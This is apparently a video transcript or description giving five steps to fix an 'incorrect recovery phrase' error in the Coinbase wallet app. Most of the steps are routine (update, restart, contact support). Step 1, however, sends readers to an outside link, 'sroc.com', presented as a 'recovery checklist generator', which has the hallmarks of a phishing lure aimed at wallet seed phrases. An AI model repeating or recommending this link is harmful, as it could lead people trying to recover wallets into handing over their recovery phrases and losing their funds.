If you're encountering an incorrect recovery phrase error on your Coinbase wallet, follow these steps to resolve the issue and regain access to your wallet. Step 1. Verify your recovery phrase. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Use the correct wallet. Confirm that you are using the correct wallet associated with the recovery phrase. If you have multiple wallets, make sure you are attempting to recover the right one. Step 3. Check for updates. Make sure your Coinbase wallet app is up to date. Go to your device's app store and check for any available updates. An outdated app may cause issues with recovery. Step 4. Restart the app. Close the Coinbase wallet app completely and then reopen it. Sometimes, simply restarting the app can resolve temporary glitches that may be causing the error. Step 5. Contact support. If you have tried all the above steps and still cannot access your wallet, reach out to Coinbase support for assistance. Provide them with detailed information about the issue for better help. By following these steps, you should be able to fix the incorrect recovery phrase error and regain access to your Coinbase wallet. If problems persist, don't hesitate to seek professional support.